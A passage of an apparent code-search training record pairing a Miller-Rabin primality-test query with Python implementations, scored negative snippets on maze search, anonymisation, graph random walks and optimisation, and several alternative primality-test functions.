[]\n ret = []\n MSTLengths = {}\n edges = {}\n\n objectives = maze.getObjectives()\n start = State(maze.getStart()[0], maze.getStart()[1], objectives)\n gFunction[start] = 0\n frontier.put(start) \n getEdgeWeights(maze, objectives, edges) # init edge weights for MST\n\n while not frontier.empty():\n\n currentState = frontier.get()\n currentCell = currentState.cell()\n objectivesLeft = currentState.objectives()\n\n if objectivesLeft.count(currentCell) != 0:\n objectivesLeft.remove(currentCell)\n\n # all objectives found, initialise backtrace and exit loop\n if len(objectivesLeft) == 0:\n path.clear()\n ret.clear()\n path.append(currentState)\n ret.append(currentCell)\n break\n \n # if we have already calculated MST length we can reuse value\n # else calculate MST length for this state and store it.\n length = 0\n if str(objectivesLeft) in MSTLengths:\n length = MSTLengths[str(objectivesLeft)]\n else:\n length = getMSTLength(objectivesLeft.copy(), maze, edges)\n MSTLengths[str(objectivesLeft)] = length\n\n neighbors = maze.getNeighbors(currentCell[0], currentCell[1])\n\n for i in neighbors:\n\n neighbor = State(i[0], i[1], objectivesLeft)\n gVal= gFunction[currentState] + 1\n\n if neighbor not in gFunction or gVal < gFunction[neighbor]:\n\n neighbor.setParent(currentState)\n gFunction[neighbor] = gVal\n\n hFunction = []\n for j in objectivesLeft:\n hFunction.append(abs(j[0] - i[0]) + abs(j[1] - i[1]) + length) # use MST length + manhatten distance to nearest objective as heuristic.\n\n hVal = min(hFunction)\n\n neighbor.setfFunction(gFunction[neighbor] + hVal)\n frontier.put(neighbor)\n\n # backtrace\n while path[0]!= start:\n \n currentCell = path[0]\n path.insert(0, currentCell.parent())\n ret.insert(0, currentCell.parent().cell())\n\n return ret", "def get_result_k(att_trees, data):\n data_back = copy.deepcopy(data)\n all_ncp = []\n all_rtime = []\n all_pollution = []\n deletion_all_ncp = []\n deletion_all_rtime = []\n # for k in range(5, 105, 5):\n for k in [2, 5, 10, 25, 50, 100]:\n if __DEBUG:\n print '#' * 30\n print \"K=%d\" % k\n print \"Enhanced Mondrian\"\n _, eval_result = mondrian(att_trees, data, k)\n data = copy.deepcopy(data_back)\n all_ncp.append(round(eval_result[0], 2))\n all_rtime.append(round(eval_result[1], 2))\n all_pollution.append(round(eval_result[2], 2))\n if __DEBUG:\n print \"NCP %0.2f\" % eval_result[0] + \"%\"\n print \"Running time %0.2f\" % eval_result[1] + \"seconds\"\n print \"Missing Pollution = %.2f %%\" % eval_result[2]\n print \"Mondrian\"\n _, eval_result = mondrian_delete_missing(att_trees, data, k)\n data = copy.deepcopy(data_back)\n if __DEBUG:\n print \"NCP %0.2f\" % eval_result[0] + \"%\"\n print \"Running time %0.2f\" % eval_result[1] + \"seconds\"\n deletion_all_ncp.append(round(eval_result[0], 2))\n deletion_all_rtime.append(round(eval_result[1], 2))\n print \"Mondrian\"\n print \"All NCP\", deletion_all_ncp\n print \"All Running time\", deletion_all_rtime\n print \"Enhanced Mondrian\"\n print \"All NCP\", all_ncp\n print \"All Running time\", all_rtime\n print \"Missing Pollution\", all_pollution", "def get_radius_idx(x, y, x0, y0, r, Tree, n_reloc=0,\r\n min_months=24, max_reloc=3, time=None, height=None):\r\n\r\n # Query the Tree from the center of cell\r\n idx = Tree.query_ball_point((x0, y0), r)\r\n\r\n #print 'query #: 1 ( first search )'\r\n\r\n if len(idx) < 2:\r\n return idx\r\n\r\n if time is not None:\r\n n_reloc = max_reloc\r\n\r\n if n_reloc < 1:\r\n return idx\r\n\r\n # Relocate center of search radius and query again\r\n for k in range(n_reloc):\r\n\r\n # Compute new search location => relocate initial center\r\n x0_new, y0_new = np.median(x[idx]), np.median(y[idx])\r\n\r\n # Compute relocation distance\r\n reloc_dist = np.hypot(x0_new-x0, y0_new-y0)\r\n\r\n # Do not allow total relocation to be larger than the search radius\r\n if reloc_dist > r:\r\n break\r\n\r\n #print 'query #:', k+2, '( reloc #:', k+1, ')'\r\n #print 'relocation dist:', reloc_dist\r\n\r\n idx = Tree.query_ball_point((x0_new, y0_new), r)\r\n\r\n # If max number of relocations reached, exit\r\n if n_reloc == k+1:\r\n break\r\n\r\n # If time provided, keep relocating until time-coverage is sufficient\r\n if time is not None:\r\n\r\n t_b, x_b = binning(time[idx], height[idx], dx=1/12., window=1/12.)[:2]\r\n\r\n print(('months #:', np.sum(~np.isnan(x_b))))\r\n\r\n # If sufficient coverage, exit\r\n if np.sum(~np.isnan(x_b)) >= min_months:\r\n break\r\n\r\n return idx", "def random_walk(G, k, convergence_threshold, plot):\n #SET: minimum amount of iterations\n min_iterations = 1000\n #SET: minimum amount of walks\n min_walks = 10\n #SET: maximum amount of walks\n max_walks = 5000 \n\n double_zero, double_one, zero_one, one_zero = 0, 0, 0, 0\n RWC_list = []\n convergence = 10000\n i = 0\n\n nodes0 = [node for node in G.nodes(data=True) if node[1]['cluster'] == 0]\n nodes1 = [node for node in G.nodes(data=True) if node[1]['cluster'] == 1]\n\n if nodes0 == [] or nodes1 == []:\n return 'NaN'\n \n degrees0 = sorted([(node[0], G.degree(node[0])) for node in nodes0], key=itemgetter(1), reverse=True)\n degrees1 = sorted([(node[0], G.degree(node[0])) for node in nodes1], key=itemgetter(1), reverse=True)\n\n k_tuples= degrees0[:int(ceil(k*len(nodes0)))] + degrees1[:int(ceil(k*len(nodes1)))]\n k_nodes= [node for (node, degree) in k_tuples]\n \n while convergence > convergence_threshold or i < min_iterations:\n # choose random cluster (choose random between 0,1), prob is 0.5\n begin_cluster = random.choice([0, 1])\n\n # choose random node in cluser\n if begin_cluster == 0:\n current_node = random.choice(nodes0)\n else:\n current_node = random.choice(nodes1)\n\n # choose random edge from cluster (repeat)\n current_node = current_node[0]\n\n j = 0\n while j < max_walks:\n previous_node = current_node\n current_node = random.choice(G.neighbors(current_node))\n #prevent self_loops\n if previous_node == current_node:\n current_node = previous_node\n j+=1\n continue\n #print('{}'.format(current_node))\n if current_node in k_nodes:\n if j < min_walks:\n continue\n else:\n break\n j += 1 \n\n # what cluster end node\n end_cluster = G.node[current_node]['cluster']\n\n #Keep tally of outcomes\n if begin_cluster == 0:\n if end_cluster == 0:\n double_zero += 1\n else:\n zero_one += 1\n else:\n if end_cluster == 0:\n one_zero += 1\n else:\n double_one += 1\n\n #calculate conditional probabilities\n total = double_zero + double_one + zero_one + one_zero\n\n prob00 = (double_zero/total) / 0.5\n prob11 = (double_one/total) / 0.5\n prob10 = (one_zero/total)/ 0.5\n prob01 = (zero_one/total)/ 0.5\n\n rwc = prob00*prob11 - prob10*prob01\n\n #update convergence \n if RWC_list != []:\n convergence = abs(rwc - RWC_list[-1])\n \n i += 1 \n RWC_list.append(rwc)\n\n # Plot RWC scores over time \n if plot == True:\n plt.plot(RWC_list)\n plt.show()\n\n return(rwc)", "def single_cuckoo_search(nest,fitness,Lb,Ub,pa,step):\n\n\tn = nest.shape[0]\n\tfmin, best, nest, fitness = get_best_nest(nest, nest, fitness)\n\tnew_best = fmin\n\told_best = np.inf\n\tbestnest = best\n\n\tN_iter=0\n\tk = 0\n\tglobal Tol\n\n\twhile N_iter < 100000:\n\t\tcuckoo = np.random.randint(n)\n\t\tnew_nest = get_cuckoo(nest, cuckoo, Lb, Ub)\n\t\tnew_obj = fobj(new_nest)\n\t\tcomp_cuckoo = np.random.randint(n)\n\t\tif new_obj < fitness[comp_cuckoo]:\n\t\t\tnest[comp_cuckoo,:] = new_nest\n\n\t\tnew_nest = empty_nests(nest, Lb, Ub, pa)\n\t\tfnew, best, nest, fitness = get_best_nest(nest, new_nest, fitness)\n\t\tif fnew < fmin:\n\t\t\tif abs(fnew - fmin) < Tol:\n\t\t\t\tbreak\n\t\t\tfmin=fnew\n\t\t\tbestnest=best\n\t\tN_iter = N_iter + 1 + int(n * pa)\n\n\treturn bestnest, fmin, nest, fitness, N_iter", "def test_jam_axi_rms():\n np.random.seed(123)\n xbin, ybin = np.random.uniform(low=[-55, -40], high=[55, 40], size=[1000, 2]).T\n\n inc = 60. # Assumed galaxy inclination\n r = np.sqrt(xbin**2 + (ybin/np.cos(np.radians(inc)))**2) # Radius in the plane of the disk\n a = 40 # Scale length in arcsec\n vr = 2000*np.sqrt(r)/(r+a) # Assumed velocity profile\n vel = vr * np.sin(np.radians(inc))*xbin/r # Projected velocity field\n sig = 8700/(r+a) # Assumed velocity dispersion profile\n rms = np.sqrt(vel**2 + sig**2) # Vrms field in km/s\n\n surf = np.array([39483., 37158., 30646., 17759., 5955.1, 1203.5, 174.36, 21.105, 2.3599, 0.25493])\n sigma = np.array([0.153, 0.515, 1.58, 4.22, 10, 22.4, 48.8, 105, 227, 525])\n qObs = np.full_like(sigma, 0.57)\n\n distance = 16.5 # Assume Virgo distance in Mpc (Mei et al. 2007)\n mbh = 1e8 # Black hole mass in solar masses\n beta = np.full_like(surf, 0.3)\n\n surf_lum = surf # Assume self-consistency\n sigma_lum = sigma\n qobs_lum = qObs\n surf_pot = surf\n sigma_pot = sigma\n qobs_pot = qObs\n\n sigmapsf = 0.6\n pixsize = 0.8\n goodbins = r > 10 # Arbitrarily exclude the center to illustrate how to use goodbins\n\n # The model is similar but not identical to the adopted kinematics!\n rmsModel, ml, chi2, flux = jam_axi_rms(\n surf_lum, sigma_lum, qobs_lum, surf_pot, sigma_pot, qobs_pot,\n inc, mbh, distance, xbin, ybin, plot=True, rms=rms, sigmapsf=sigmapsf,\n beta=beta, pixsize=pixsize, tensor='zz', goodbins=goodbins)\n plt.pause(0.01)", "def _AffineGrothendieck(self, w,m):\n return sum(self._G_to_km_on_basis_single_level(w,j) for j in range(w.length(),m+1))" ]
[ "0.615799", "0.5902298", "0.58482414", "0.57372916", "0.57352954", "0.57080084", "0.56059325", "0.55901784", "0.5569681", "0.55468035", "0.5539385", "0.5525096", "0.5479864", "0.546164", "0.54158294", "0.5414072", "0.53997874", "0.53977036", "0.5389939", "0.5384784", "0.5362815", "0.53549546", "0.5301085", "0.5295417", "0.5290579", "0.528696", "0.52823", "0.5246708", "0.5243289", "0.52287936", "0.5216233", "0.5214604", "0.5214077", "0.5192999", "0.5192729", "0.51729304", "0.5171315", "0.51652074", "0.51503265", "0.51499903", "0.513627", "0.51331955", "0.51302135", "0.5109444", "0.5107845", "0.5104503", "0.5098292", "0.5096239", "0.5095959", "0.5092094", "0.5075559", "0.50672966", "0.5059657", "0.50586104", "0.5038748", "0.50296474", "0.5024526", "0.50214326", "0.50187755", "0.5017733", "0.5015472", "0.5013709", "0.5010562", "0.50096685", "0.5009475", "0.5008232", "0.50034887", "0.50014865", "0.50008297", "0.49996176", "0.49970642", "0.49955305", "0.49944803", "0.49940526", "0.4980558", "0.49784267", "0.49782008", "0.49767074", "0.49739233", "0.49667075", "0.49568275", "0.49507892", "0.49505702", "0.49501905", "0.49470818", "0.49396026", "0.49350318", "0.4921503", "0.49128768", "0.49050105", "0.49001536", "0.4899565", "0.4899018", "0.4897662", "0.48964038", "0.48953816", "0.4893123", "0.48923257", "0.4887874", "0.48827052" ]
0.68557984
0
Implementation uses the MillerRabin Primality Test The optimal number of rounds for this test is 40
def miller_rabin(n,k): if n == 2: return True if n % 2 == 0: return False r, s = 0, n - 1 while s % 2 == 0: r += 1 s //= 2 for _ in range(k): a = random.randrange(2, n - 1) x = pow(a, s, n) if x == 1 or x == n - 1: continue for _ in range(r - 1): x = pow(x, 2, n) if x == n - 1: break else: return False return True
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def rabin_miller_is_prime(n, k=100):\n\n def basic_is_prime(_n):\n \"\"\"Basic check to see if input is a prime.\n Returns False if input number is a composite with at least one term being one of the primes below 10.000.\n Returns True if the number is a prime (can only be known if it is in the list of primes OR if the number is\n larger than the largest prime in the list and smaller than the square of the last number in the list)\n Returns None if test is inconclusive (if the number has no factors in the list, and is larger than the square\n of the last number in the list).\n\n This code was made by Sahand Saba.\n\n\n :param _n: number to be tested\n :return test result: True, False or None\n \"\"\"\n if _n < 2:\n return False\n for p in [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101,\n 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199,\n 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317,\n 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443,\n 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577,\n 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701,\n 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839,\n 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983,\n 991, 997, 1009, 1013, 1019, 1021, 1031, 1033, 1039, 1049, 1051, 1061, 1063, 1069, 1087, 1091, 1093,\n 1097, 1103, 1109, 1117, 1123, 1129, 1151, 1153, 1163, 1171, 1181, 1187, 1193, 1201, 1213, 1217, 1223,\n 1229, 1231, 1237, 1249, 1259, 1277, 1279, 1283, 1289, 1291, 1297, 1301, 1303, 1307, 1319, 1321, 1327,\n 1361, 1367, 1373, 1381, 1399, 1409, 1423, 1427, 1429, 1433, 1439, 1447, 1451, 1453, 1459, 1471, 1481,\n 1483, 1487, 1489, 1493, 1499, 1511, 1523, 1531, 1543, 1549, 1553, 1559, 1567, 1571, 1579, 1583, 1597,\n 1601, 1607, 1609, 1613, 1619, 1621, 1627, 1637, 1657, 1663, 1667, 1669, 1693, 1697, 1699, 1709, 1721,\n 1723, 1733, 1741, 1747, 1753, 1759, 1777, 1783, 1787, 1789, 1801, 1811, 1823, 1831, 1847, 1861, 1867,\n 1871, 1873, 1877, 1879, 1889, 1901, 1907, 1913, 1931, 1933, 1949, 1951, 1973, 1979, 1987, 1993, 1997,\n 1999, 2003, 2011, 2017, 2027, 2029, 2039, 2053, 2063, 2069, 2081, 2083, 2087, 2089, 2099, 2111, 2113,\n 2129, 2131, 2137, 2141, 2143, 2153, 2161, 2179, 2203, 2207, 2213, 2221, 2237, 2239, 2243, 2251, 2267,\n 2269, 2273, 2281, 2287, 2293, 2297, 2309, 2311, 2333, 2339, 2341, 2347, 2351, 2357, 2371, 2377, 2381,\n 2383, 2389, 2393, 2399, 2411, 2417, 2423, 2437, 2441, 2447, 2459, 2467, 2473, 2477, 2503, 2521, 2531,\n 2539, 2543, 2549, 2551, 2557, 2579, 2591, 2593, 2609, 2617, 2621, 2633, 2647, 2657, 2659, 2663, 2671,\n 2677, 2683, 2687, 2689, 2693, 2699, 2707, 2711, 2713, 2719, 2729, 2731, 2741, 2749, 2753, 2767, 2777,\n 2789, 2791, 2797, 2801, 2803, 2819, 2833, 2837, 2843, 2851, 2857, 2861, 2879, 2887, 2897, 2903, 2909,\n 2917, 2927, 2939, 2953, 2957, 2963, 2969, 2971, 2999, 3001, 3011, 3019, 3023, 3037, 3041, 3049, 3061,\n 3067, 3079, 3083, 3089, 3109, 3119, 3121, 3137, 3163, 3167, 3169, 3181, 3187, 3191, 3203, 3209, 3217,\n 3221, 3229, 3251, 3253, 3257, 3259, 3271, 3299, 3301, 3307, 3313, 3319, 3323, 3329, 3331, 3343, 3347,\n 3359, 3361, 3371, 3373, 3389, 3391, 3407, 3413, 3433, 3449, 3457, 3461, 3463, 3467, 3469, 3491, 3499,\n 3511, 3517, 3527, 3529, 3533, 3539, 3541, 3547, 3557, 3559, 3571, 3581, 3583, 3593, 3607, 3613, 3617,\n 3623, 3631, 3637, 3643, 3659, 3671, 3673, 3677, 3691, 3697, 3701, 3709, 3719, 3727, 3733, 3739, 3761,\n 3767, 3769, 3779, 3793, 3797, 3803, 3821, 3823, 3833, 3847, 3851, 3853, 3863, 3877, 3881, 3889, 3907,\n 3911, 3917, 3919, 3923, 3929, 3931, 3943, 3947, 3967, 3989, 4001, 4003, 4007, 4013, 4019, 4021, 4027,\n 4049, 4051, 4057, 4073, 4079, 4091, 4093, 4099, 4111, 4127, 4129, 4133, 4139, 4153, 4157, 4159, 4177,\n 4201, 4211, 4217, 4219, 4229, 4231, 4241, 4243, 4253, 4259, 4261, 4271, 4273, 4283, 4289, 4297, 4327,\n 4337, 4339, 4349, 4357, 4363, 4373, 4391, 4397, 4409, 4421, 4423, 4441, 4447, 4451, 4457, 4463, 4481,\n 4483, 4493, 4507, 4513, 4517, 4519, 4523, 4547, 4549, 4561, 4567, 4583, 4591, 4597, 4603, 4621, 4637,\n 4639, 4643, 4649, 4651, 4657, 4663, 4673, 4679, 4691, 4703, 4721, 4723, 4729, 4733, 4751, 4759, 4783,\n 4787, 4789, 4793, 4799, 4801, 4813, 4817, 4831, 4861, 4871, 4877, 4889, 4903, 4909, 4919, 4931, 4933,\n 4937, 4943, 4951, 4957, 4967, 4969, 4973, 4987, 4993, 4999, 5003, 5009, 5011, 5021, 5023, 5039, 5051,\n 5059, 5077, 5081, 5087, 5099, 5101, 5107, 5113, 5119, 5147, 5153, 5167, 5171, 5179, 5189, 5197, 5209,\n 5227, 5231, 5233, 5237, 5261, 5273, 5279, 5281, 5297, 5303, 5309, 5323, 5333, 5347, 5351, 5381, 5387,\n 5393, 5399, 5407, 5413, 5417, 5419, 5431, 5437, 5441, 5443, 5449, 5471, 5477, 5479, 5483, 5501, 5503,\n 5507, 5519, 5521, 5527, 5531, 5557, 5563, 5569, 5573, 5581, 5591, 5623, 5639, 5641, 5647, 5651, 5653,\n 5657, 5659, 5669, 5683, 5689, 5693, 5701, 5711, 5717, 5737, 5741, 5743, 5749, 5779, 5783, 5791, 5801,\n 5807, 5813, 5821, 5827, 5839, 5843, 5849, 5851, 5857, 5861, 5867, 5869, 5879, 5881, 5897, 5903, 5923,\n 5927, 5939, 5953, 5981, 5987, 6007, 6011, 6029, 6037, 6043, 6047, 6053, 6067, 6073, 6079, 6089, 6091,\n 6101, 6113, 6121, 6131, 6133, 6143, 6151, 6163, 6173, 6197, 6199, 6203, 6211, 6217, 6221, 6229, 6247,\n 6257, 6263, 6269, 6271, 6277, 6287, 6299, 6301, 6311, 6317, 6323, 6329, 6337, 6343, 6353, 6359, 6361,\n 6367, 6373, 6379, 6389, 6397, 6421, 6427, 6449, 6451, 6469, 6473, 6481, 6491, 6521, 6529, 6547, 6551,\n 6553, 6563, 6569, 6571, 6577, 6581, 6599, 6607, 6619, 6637, 6653, 6659, 6661, 6673, 6679, 6689, 6691,\n 6701, 6703, 6709, 6719, 6733, 6737, 6761, 6763, 6779, 6781, 6791, 6793, 6803, 6823, 6827, 6829, 6833,\n 6841, 6857, 6863, 6869, 6871, 6883, 6899, 6907, 6911, 6917, 6947, 6949, 6959, 6961, 6967, 6971, 6977,\n 6983, 6991, 6997, 7001, 7013, 7019, 7027, 7039, 7043, 7057, 7069, 7079, 7103, 7109, 7121, 7127, 7129,\n 7151, 7159, 7177, 7187, 7193, 7207, 7211, 7213, 7219, 7229, 7237, 7243, 7247, 7253, 7283, 7297, 7307,\n 7309, 7321, 7331, 7333, 7349, 7351, 7369, 7393, 7411, 7417, 7433, 7451, 7457, 7459, 7477, 7481, 7487,\n 7489, 7499, 7507, 7517, 7523, 7529, 7537, 7541, 7547, 7549, 7559, 7561, 7573, 7577, 7583, 7589, 7591,\n 7603, 7607, 7621, 7639, 7643, 7649, 7669, 7673, 7681, 7687, 7691, 7699, 7703, 7717, 7723, 7727, 7741,\n 7753, 7757, 7759, 7789, 7793, 7817, 7823, 7829, 7841, 7853, 7867, 7873, 7877, 7879, 7883, 7901, 7907,\n 7919, 7927, 7933, 7937, 7949, 7951, 7963, 7993, 8009, 8011, 8017, 8039, 8053, 8059, 8069, 8081, 8087,\n 8089, 8093, 8101, 8111, 8117, 8123, 8147, 8161, 8167, 8171, 8179, 8191, 8209, 8219, 8221, 8231, 8233,\n 8237, 8243, 8263, 8269, 8273, 8287, 8291, 8293, 8297, 8311, 8317, 8329, 8353, 8363, 8369, 8377, 8387,\n 8389, 8419, 8423, 8429, 8431, 8443, 8447, 8461, 8467, 8501, 8513, 8521, 8527, 8537, 8539, 8543, 8563,\n 8573, 8581, 8597, 8599, 8609, 8623, 8627, 8629, 8641, 8647, 8663, 8669, 8677, 8681, 8689, 8693, 8699,\n 8707, 8713, 8719, 8731, 8737, 8741, 8747, 8753, 8761, 8779, 8783, 8803, 8807, 8819, 8821, 8831, 8837,\n 8839, 8849, 8861, 8863, 8867, 8887, 8893, 8923, 8929, 8933, 8941, 8951, 8963, 8969, 8971, 8999, 9001,\n 9007, 9011, 9013, 9029, 9041, 9043, 9049, 9059, 9067, 9091, 9103, 9109, 9127, 9133, 9137, 9151, 9157,\n 9161, 9173, 9181, 9187, 9199, 9203, 9209, 9221, 9227, 9239, 9241, 9257, 9277, 9281, 9283, 9293, 9311,\n 9319, 9323, 9337, 9341, 9343, 9349, 9371, 9377, 9391, 9397, 9403, 9413, 9419, 9421, 9431, 9433, 9437,\n 9439, 9461, 9463, 9467, 9473, 9479, 9491, 9497, 9511, 9521, 9533, 9539, 9547, 9551, 9587, 9601, 9613,\n 9619, 9623, 9629, 9631, 9643, 9649, 9661, 9677, 9679, 9689, 9697, 9719, 9721, 9733, 9739, 9743, 9749,\n 9767, 9769, 9781, 9787, 9791, 9803, 9811, 9817, 9829, 9833, 9839, 9851, 9857, 9859, 9871, 9883, 9887,\n 9901, 9907, 9923, 9929, 9931, 9941, 9949, 9967, 9973]:\n if _n % p == 0:\n return _n == p\n if _n < 1E8: # Limit 1E8, because we have all primes below 1E4\n return True\n else:\n return None\n\n b = basic_is_prime(n)\n if b is not None:\n # Basic test gave answer\n return b\n\n m = n - 1\n s = 0\n while m % 2 == 0:\n s += 1\n m //= 2\n liars = set()\n\n def get_new_x():\n return random.randint(2, n - 1)\n\n while len(liars) < k:\n x = get_new_x()\n while x in liars:\n x = get_new_x()\n xi = pow(x, m, n)\n witness = True\n if xi == 1 or xi == n - 1:\n witness = False\n else:\n for __ in range(s - 1):\n xi = (xi ** 2) % n\n if xi == 1:\n return False\n elif xi == n - 1:\n witness = False\n break\n xi = (xi ** 2) % n\n if xi != 1:\n return False\n if witness:\n return False\n else:\n liars.add(x)\n return True", "def miller_rabin(n):\n assert(n >= 1)\n if n == 2:\n return True\n if n <= 1 or not n & 1:\n return False\n\n primes = [2, 3, 5, 7, 11, 13, 17, 19, 23]\n\n d = n - 1\n s = 0\n while not d & 1:\n d >>= 1\n s += 1\n\n for prime in primes:\n if prime >= n:\n continue\n x = pow(prime, d, n)\n if x == 1:\n continue\n for r in range(s):\n if x == n - 1:\n break\n if r + 1 == s:\n return False\n x = x * x % n\n return True", "def millerRabin(p, s=40):\n\n from ressources import config as conf\n\n if p in conf.COMMON_PRIMES:\n return True\n if not (p & 1): # n is a even number and can't be prime\n return False\n\n p1 = p - 1\n u = 0\n r = p1 # p-1 = 2**u * r\n\n while r % 2 == 0:\n r >>= 1\n u += 1\n\n # at this stage p-1 = 1 << u * r holds\n assert p - 1 == (1 << u) * r\n\n def witness(a):\n \"\"\"\n Returns:\n True, if there is a witness that p is not prime.\n False, when p might be prime\n \"\"\"\n z = square_and_multiply(a, r, p)\n if z == 1:\n return False\n\n for i in range(u):\n z = square_and_multiply(a, (1 << i) * r, p)\n if z == p1:\n return False\n return True\n\n for _ in range(s):\n a = random.randrange(2, p - 2)\n if witness(a):\n return False\n\n return True", "def is_miller_rabin_prime(n):\n if n <= 1:\n return False\n elif n == 2:\n return True\n elif n % 2 == 0:\n return False\n \n witnesses = get_witnesses(n)\n if witnesses is None:\n msg = 'No definite Miller-Rabin test is available for %d' % n\n raise ValueError(msg)\n \n d, s = factorN(n-1)\n for w in witnesses:\n if is_composite(w, n, d, s):\n return False\n \n return True", "def is_miller_rabin_prime(n):\n if n <= 1:\n return False\n elif n == 2:\n return True\n elif n % 2 == 0:\n return False\n \n witnesses = get_witnesses(n)\n if witnesses is None:\n msg = 'No definite Miller-Rabin test is available for %d' % n\n raise ValueError(msg)\n \n d, s = factorN(n-1)\n for w in witnesses:\n if is_composite(w, n, d, s):\n return False\n \n return True", "def miller_rabin(n, k=10):\n\tif n == 2:\n\t\treturn True\n\tif not n & 1:\n\t\treturn False\n\n\tdef temoin(a, s, d, n):\n\t\tx = pow(a, d, n)\n\t\tif x == 1:\n\t\t\treturn False\n\t\tfor i in range(s - 1):\n\t\t\tif x == n - 1:\n\t\t\t\treturn False\n\t\t\tx = pow(x, 2, n)\n\t\treturn x != n - 1\n\n\ts = 0\n\td = n - 1\n\n\twhile d % 2 == 0:\n\t\td >>= 1\n\t\ts += 1\n\n\tfor i in range(k):\n\t\ta = randrange(2, n - 1)\n\t\tif temoin(a, s, d, n):\n\t\t\treturn False\n\treturn True", "def millerRabin(n, r):\n\n if n < 2: # 0, 1 and negative numbers are considered not prime\n return False\n\n ############ CALCULATING d AND i #########\n # find the values d and i s.t. 2^i * d = n - 1\n d = n - 1\n i = 0\n\n while not d & 1:\n d >>= 1\n i += 1\n\n ############ TEST ONE WITNESS FOR EACH MR-ROUND #########\n for _ in range(r):\n\n # get random witness\n w = secrets.SystemRandom().randrange(2, n - 1)\n\n # use power-remainder method\n z = powerRemainder(w, d, n)\n\n # if z is 1 or n -1 then w is not a witness for n being a composite number\n if z not in (1, n - 1):\n\n # check no j s.t. (w^(2^j)) ^ d = -1 (mod n)\n for j in range(i):\n\n # get next z\n z = powerRemainder(w, 2 ** j * d, n)\n\n if z == 1: # n is definitely composite\n return False # return False\n elif z == n -1 : # n is prime or the witness is a strong liar\n break # break to next witness\n\n else:\n return False # if the inner loop didn't break, n is composite\n\n return True # if no witness can be found for n being composite, it is a probable prime", "def miller_rabin_pt(n, rounds):\n d = n - 1\n r = 0\n\n while d % 2 == 0:\n d >>= 1\n r += 1\n\n for _ in range(rounds):\n a = random.randint(2, n - 2)\n b = pow(a, d, n)\n if b == 1 or b == n - 1:\n continue\n for _ in range(r - 1):\n b = pow(b, 2, n)\n if b == n - 1:\n break\n else:\n return False\n\n return True", "def checks(candidate, primeList, r = 10):\n\n ############ 6k BASIC CHECK #########\n # all primes > 3 are of the form 6k + 1 or 6k -1 so skip testing any not of this form\n mod6 = candidate % 6\n\n if candidate > 3 and mod6 != 1 and mod6 != 5:\n return False # if check fails return False\n\n ############ TRIAL-DIVISION CHECK #########\n if not trialDivision(candidate, primeList):\n return False # if check fails return False\n\n ############ Miller-Rabin CHECK #########\n return millerRabin(candidate, r)", "def miller_rabin(n, k=50):\n if n < 6:\n return [ValueStatus(n,False), ValueStatus(n,False), ValueStatus(n,True), ValueStatus(n,True), ValueStatus(n,False), ValueStatus(n,True)][n]\n elif n & 1 == 0:\n return ValueStatus(n,False)\n s = 0\n d = n - 1\n while d % 2 == 0:\n s = s + 1\n d = d >> 1\n for t in range(k):\n a = randint(2, n-2)\n x = pow(a, d, n)\n if x == 1 or x == n-1:\n continue\n for _ in range(s-1):\n x = pow(x, 2, n)\n if x == 1:\n return ValueStatus(n,False,t=t)\n elif x == n - 1:\n a = 0\n break\n if a:\n return ValueStatus(n,False,t=t)\n return ValueStatus(n,True)", "def rabin_miller(n, target=128):\n ###############\n ## Start your code here\n return True\n ## End of your code\n ###############", "def rabinMillerPassed(mrc, rabin_miller_rounds):\n maxDivisionsByTwo = 0\n ec = mrc - 1\n while ec % 2 == 0:\n ec >>= 1\n maxDivisionsByTwo += 1\n assert (2 ** maxDivisionsByTwo * ec == mrc - 1)\n\n def trialComposite(round_tester):\n if pow(round_tester, ec, mrc) == 1:\n return False\n for i in range(maxDivisionsByTwo):\n if pow(round_tester, 2 ** i * ec, mrc) == mrc - 1:\n return False\n return True\n\n # Set number of trials here\n for i in range(rabin_miller_rounds):\n round_tester = random.randrange(2, mrc)\n if trialComposite(round_tester):\n return False\n return True", "def Pollard_pm1(n, primes, max_B=1000000):\n B = 10\n g = 1\n while B < max_B and g < n:\n a = randint(2, n - 2)\n g = gcd(a, n)\n if g != 1:\n return g\n for p in primes:\n if p >= B:\n break\n pd = 1 # p^d\n while pd * p <= B:\n pd *= p\n a = powmod(a, pd, n)\n g = gcd(a - 1, n)\n if g != 1 and g != n:\n return g\n B *= 2\n return 1", "def isprime(n):\n if n!=int(n):\n return False\n n=int(n)\n #Miller-Rabin test for prime\n if n==0 or n==1 or n==4 or n==6 or n==8 or n==9:\n return False\n\n if n==2 or n==3 or n==5 or n==7:\n return True\n s = 0\n d = n-1\n while d%2==0:\n d>>=1\n s+=1\n assert(2**s * d == n-1)\n\n def trial_composite(a):\n if pow(a, d, n) == 1:\n return False\n for i in range(s):\n if pow(a, 2**i * d, n) == n-1:\n return False\n return True\n\n for i in range(8):#number of trials\n a = random.randrange(2, n)\n if trial_composite(a):\n return False\n\n return True", "def miller_rabin_base_2(n):\n d = n-1\n s = 0\n while not d & 1: # Check for divisibility by 2\n d = d >> 1 # Divide by 2 using a binary right shift\n s += 1\n\n x = pow(2, d, n)\n if x == 1 or x == n-1:\n return True\n for i in range(s-1):\n x = pow(x, 2, n)\n if x == 1:\n return False\n elif x == n - 1:\n return True\n return False", "def _miller_rabin_test(possible_prime: int, d: int) -> bool:\n a = random.randint(2, possible_prime - 2)\n adn = square_and_multiply(a, d, possible_prime)\n\n if adn == 1 or adn == possible_prime - 1:\n return True\n\n while d != possible_prime - 1:\n adn = square_and_multiply(adn, 2, possible_prime)\n d *= 2\n\n if adn == 1:\n return False\n\n if adn == possible_prime - 1:\n return True\n\n return False", "def miller_rabin_base_2(n):\n d, s = n - 1, 0\n while not d & 1:\n d, s = d >> 1, s + 1\n\n x = pow(2, d, 